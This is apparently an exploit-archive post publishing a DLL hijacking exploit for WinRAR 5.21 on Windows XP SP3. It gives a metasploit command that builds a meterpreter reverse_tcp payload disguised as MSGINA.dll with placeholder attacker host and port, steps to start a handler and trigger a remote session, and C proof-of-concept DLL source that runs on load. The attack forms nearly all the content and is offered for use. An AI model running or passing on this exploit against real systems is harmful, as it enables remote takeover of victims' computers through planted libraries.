facebook facebook twitter rss

WinRAR 5.21 DLL Hijacking

Author: Bedo Mado , Published: 09-04-2015
/*

#[+] Author: Bedo Mado

#[+] Exploit Title: WinRAR 5.21 DLL Hijacking

#[+] Date: 7-4-2015

#[+] Type: Local Exploits

#[+] Vendor : http://www.filehippo.com/download_winrar_32/tech/

#[+] Tested on: Windows XpSP3

#[+]Infected Dll Library --> MSGINA.dll

#[+]exploit with metasploit :>

(1)Make dll payload :> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > MSGINA.dll

(3)start multi handler

(4)Execute The software

#[+] BOOOOOM !!!! Meterpreter session oppened

#[+] GR33TZ : Hassan Abd Elaziz - Sn1p3rM4tr1x - Toni - ViRus Os - Rami Kilwa - EgyptSoldiers - AnuBis Egy

#[+] facebook : fb.com/Bedo0.Mado0

#if you Want To Experience The Exploit. Copy it to the software dir. then execute the software , calc.exe will launch ^_^.

Proof of Concept (PoC):

============================

*/

#include <windows.h>



int Hijacked()

{

WinExec("calc", 0);

exit(0);

return 0;

}



BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

Hijacked();

return 0;

}

Like us on Facebook :